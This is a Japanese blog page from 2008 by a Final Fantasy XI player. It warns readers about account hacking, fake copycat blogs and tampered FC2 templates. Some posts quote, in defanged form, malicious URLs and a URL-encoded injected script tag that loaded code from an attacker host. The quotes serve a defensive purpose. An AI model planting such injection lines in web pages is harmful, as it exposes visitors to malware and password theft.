アカウントハック関連

アカウントハック関連に関する記事です。

次回VUのお知らせが公式にきてましたが
ログインメッセージをつかって全ユーザーに告知するなら
ちっさい画像１枚だけとかヤメテくださいよほんと・・・
そんなことするなら垢ハック関連の注意喚起でもしてくださいと。

７月初旬頃に猛威を振るった中華の垢ハック新手口が
最近になって解明されているようです。
もう既に各所で話題になっていますのでご存じの方も多いと思われますが
まだご覧になっていない方のために
個人的に一番読みやすかった第七猫さんの記事にリンク
「ウィルス検出に関して【ＰＣ版の方、要チェックをッ！】」byFF11　ペット狩り黒猫奮闘記

中華様には本当に困ったものですが
ネットの情報に流されすぎてしまうのも考え物というお話。

≫[レジストリの改竄]の続きを読む

[RSS]

▼ やっと、、やっと！！！

2008/07/12(土)

公式ページに7/11付けの重要なお知らせとして
『プレイオンラインへの一部接続元からの接続制限について』
というものが出ていました。

先週、先々週の大量垢ハックを受けてついに重い腰を上げて
中国IPを弾くことにしたのでしょう。
これで完全な効果が得られるとは思いませんが、
大きな一歩になると期待しています。。

ちなみに、ASAHI.netからの接続が巻き込まれて規制されているようです。
ルーターを何度か再起動するとつながるかもしれないとの事。。
巻き込まれてしまった人は試してみるといいかも？

[RSS]

▼ またまた偽ブログ

2008/06/17(火)

以前も似たようなことがありましたが…
当ブログをコピーした偽ブログが作成されています。
また、R-typeその他の名で偽ブログに誘導するコメントがつけられています

私がR-typeの名前でコメントをする際には
このブログのURL：http://ffxiwar.blog91.fc2.com/以外を使用することはありません
このURL以外の書き込みがあった場合、即刻削除していただいて構いません。

確認されている偽ブログはyaplogにてffxiwairというアカウントを取得しています。

このhxxp://yaplog■jp/ffxiwair/（アクセス防止のため一部改変）
現時点でDr.webでのチェックをパスしていきます（；ω；）
（ソースチェッカーオンラインでのチェック結果）
インラインフレームのURLを再チェックで危険URLと警告アリ。
topページにiframeでhxxp://www■infosueek■com/ff11diaryを読み込み
他に外部リンクを張った部分のリンク先を
hxxp://www■infosueek■com/ff11wiki/
（Dr.webでも赤判定＝既知のウィルス)
に書き換えてあるようです。
どちらも既存の対策であるiframe禁止と
飛び先のチェックをしておけば防げることではありますが
うっかり表示してしまった方は
早急にPOLパスの変更およびウィルススキャンをおねがいします。

続きに今月に入って垢ハックが増えている件について

≫[またまた偽ブログ]の続きを読む

[RSS]

▼ 取り急ぎ警告

2008/04/29(火)

取り急ぎの警告
ヴァナモンさんの本家サイトのほうが改ざんを受けています。（4/29/AM6:00現在も）
エリア別詳細のページでNoScriptがcnzz.comをブロックしています

Javascriptが有効になった状態でヴァナモンさんをご覧になったかたは
スキャンとパスの変更をしておいたほうがよろしいかと思います。

[RSS]

▼ スクエニさんの方針とFC2の回答

2008/04/24(木)

FFの方の不正アクセスについてのポリシーが更新されたとお知らせが出ていました。
以前発表のあった垢ハックに対する救済措置の具体的方針が示されています。
詳細はこちら→スクエニ公式:不正アクセス対策

加えてFC2の方への問い合わせのお返事が来ていましたので
それも合わせて折りたたみの中に

≫[スクエニさんの方針とFC2の回答]の続きを読む

[RSS]

▼ FC2ブログ、一応の対策！？

2008/04/18(金)

たびたび皆様をお騒がせしてしまっていたFC2ブログ改竄について
FC2の方から公式な見解が発表されました。

以下、FC2ブログ管理者用お知らせより。
不正ログイン対策対応状況につきまして
一部ユーザー様のご利用のサービスに不正ログインが行われ、
ページを改ざんされる例がある件につきましてご報告申し上げます。
という文章からはじまり、
【不正アクセスが行われていた期間】
【不正アクセスの対象】
【上記についての対策】
という各項目が非常にさらっと書いてあります。
対象が有名オンラインゲームと明言されているので
今回の騒動についてであることが想像できますが、
実際被害にあって散々メールを送った管理人本人へ直接、
「対策済んだよ」とメールしてくれるぐらいの気概を見せて欲しかったところです。
もちろんそんな物はありませｎ
対策は一通り済んでいて、その対策後あらたな被害は出ていない
とのことですから一応安心してもいいのかもしれません。

一応対策済みとのことですが、現在当ブログでは
Firefox+NoScriptでifarme禁止設定＆不正スクリプト禁止設定にて閲覧して
何か不正な物があればすぐにわかるようにと気をつけてはいます。

FFのアカウントに限らず、ネット上では何があるかわかりません。
今回の騒動を教訓に自衛手段を強化するきっかけにしたいと思います。

以下ちょっとしたグチみたいなもの。

≫[FC2ブログ、一応の対策！？]の続きを読む

[RSS]

▼ スクエニの重い腰

2008/03/29(土)

やっとこ公式ページにも警告のコメントがでましたね
　2008.03.29(土) 01:00　From: プレイオンライン
　アカウントハッキングにご注意ください
公式のトップページには表示されていなくて、
インフォメーションを見なければわからないところも問題ですが、、

ソースとして表示しているリンク先が英語って(´・ω・｀)
事件発覚の直後で英語のソースしか無かったというのならまだ許せますが
１０日以上も経ってて日本語の解説サイトが山ほどある現状でコレは何なんですかね

まぁ、何も無いよりはいいですよね。。
救済策の拡大もあるようですし、期待しておきましょう。

アカハック関連リンク
・FF11アカハク
・リネージュ資料室セキュリティ対策
・FF11ペット狩り黒猫奮闘記　ウィルス検出について【現状まとめ】
この辺を見て皆様各自の判断で自衛してくださいますようよろしくお願いいたします。

最低限の対策として、windowsのアップデートはしてください。
リアルプレイヤーもアンインストールするか、
最新版に変更するようにしてください。

[RSS]

▼ ついにカテゴリー新設(´・ω・｀)

2008/03/23(日)

<3/25：ちょっと追記>

テンプレ改竄関連の記事ばかりが並ぶのは嫌なのですが
また新しい情報があったので皆様にご報告

今回は
＜iframe＞ではなく
＜script　src=http:****＞という形をとってきたということ
幸い、当ブログでは被害はありませんでしたが
第七猫様の報告によると
①ペコろぐ　様（Javaスクリプト発見、要注意→現在修正し公開）
②ヴァナモンＢｌｏｇ　様（Javaスクリプト発見、修正済み（3/25.16:30現在））
③FF11ある黒魔導士の軌跡　様（インラインフレーム発見、修正済み（3/25.16:30現在））
だそうです

＜script language="javascript"
　src="hｘｘp://
%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"＞

FF11ある黒魔導士の奇跡様では
3/23PM13:45現在このようなスクリプトが見つかっています。
（誤アクセス防止のため、ｔをｘに変更しております）
管理人様が引退されているので、対策が遅れる可能性があります。
ご注意ください

そして、このスクリプトで読み出される
hｘｘp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73 
はデコードすると前回私が改竄被害にあった
”ｗｗｗ■ｈｅｌｌｈ■ｎｅｔ”

またおまえかっっ！！！

≫[ついにカテゴリー新設(´・ω・｀)]の続きを読む

[RSS]

▼ テンプレート改竄事件再び。

2008/03/11(火)

テンプレ改竄事件の注意喚起をしていたところに
また、当ブログよりウィルスが検知されたという報告を頂き
今回はまる二日近く閉めておりました(´・ω・｀)

足を運んでくださっている方に対し申し訳ない気持ちでいっぱいです(´・ω・｀)
今回は対策の進んでいる方も多いとは思いますが
今一度自衛手段の確認のほどよろしくお願いします。

事の顛末を詳しくお知らせしておこうと思います。

≫[テンプレート改竄事件再び。]の続きを読む

[RSS]

▼ テンプレートが書き換えられている！

2008/03/03(月)

ブロガーの皆様に緊急警告＆読者様にお願い

本日未明、ねこねこサンタ様より当ブログにウィルスを発見というコメントを頂き
万が一を考えて対処が終わるまで非公開にしておりました。
その間にご来訪いただいた方にはご心配をおかけしてしまって申し訳ありません。

問題の原因がわかりましたのでご報告いたします。
発見されたウィルス：Exploit-RealPlay
これをグーグル先生にきいてみたところ
マカフィーのこちらのページで見つけることができました。
種別：トロイの木馬タイプ　だそうですが
これの関連でWoWのパス抜きに使われたという事例も見つかったので（→こちら）
当ブログを読んでいただいた皆様は大変お手数ではありますが
是非ともウィルスチェックをして頂きたい。
以下にオンラインのウィルスチェックをいくつかお知らせしておきます。
・シマンテックセキュリティスキャン
・カスペルスキーオンラインスキャナ
・ウイルスバスターオンラインスキャン
いずれも無料で利用できるものですが、
FireFoxからの利用はできませんのでIEからアクセスしてチェックしておいてください。
ちなみに、私のPCは感染していませんでした。

そして、今回最も驚いたことは
テンプレートが勝手に書き換えられている！　ということ
FC2ブログ利用の皆様には是非とも注意していただきたい。

≫[テンプレートが書き換えられている！]の続きを読む